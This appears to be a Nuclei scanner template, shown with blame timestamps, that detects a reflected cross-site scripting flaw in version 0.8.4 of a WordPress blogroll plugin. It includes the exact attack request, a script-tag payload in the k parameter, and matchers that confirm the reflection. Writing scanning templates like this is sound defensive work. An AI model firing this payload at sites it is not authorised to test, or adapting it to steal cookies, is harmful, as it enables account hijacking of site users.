nuclei-templates/vulnerabilities/wordpress/wp-blogroll-fun-xss.yaml

43 lines
1.6 KiB
YAML
Raw Normal View History

2022-08-04 16:53:16 +00:00
id: wp-blogroll-fun-xss
info:
name: WordPress Blogroll Fun-Show Last Post and Last Update Time 0.8.4 - Cross-Site Scripting
2022-08-04 16:53:16 +00:00
author: DhiyaneshDK
severity: high
2022-08-04 16:53:16 +00:00
description: |
WordPress Plugin Blogroll Fun-Show Last Post and Last Update Time 0.8.4 and possibly prior versions are prone to a cross-site scripting vulnerability because of a failure to properly sanitize user-supplied input. An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This can allow the attacker to steal cookie-based authentication credentials and launch other attacks.
remediation: Update to plugin version 0.8.5 or later.
2022-08-04 16:53:16 +00:00
reference:
- https://codevigilant.com/disclosure/wp-plugin-blogroll-fun-a3-cross-site-scripting-xss/
- https://www.acunetix.com/vulnerabilities/web/wordpress-plugin-blogroll-fun-show-last-post-and-last-update-time-cross-site-scripting-0-8-4/
metadata:
verified: true
classification:
cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:L/A:N
cvss-score: 7.2
cwe-id: CWE-79
2022-08-10 16:32:23 +00:00
tags: wordpress,wp-plugin,xss,unauth,wp
2022-08-04 16:53:16 +00:00
requests:
- method: GET
path:
- "{{BaseURL}}/wp-content/plugins/blogroll-fun/blogroll.php?k=%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E"
matchers-condition: and
matchers:
- type: word
2022-08-06 17:36:51 +00:00
part: body
2022-08-04 16:53:16 +00:00
words:
- 'Got: <script>alert(document.domain)</script><br>'
- type: word
2022-08-06 17:36:51 +00:00
part: header
2022-08-04 16:53:16 +00:00
words:
- 'text/html'
- type: status
status:
- 200
# Enhanced by mp on 2022/09/07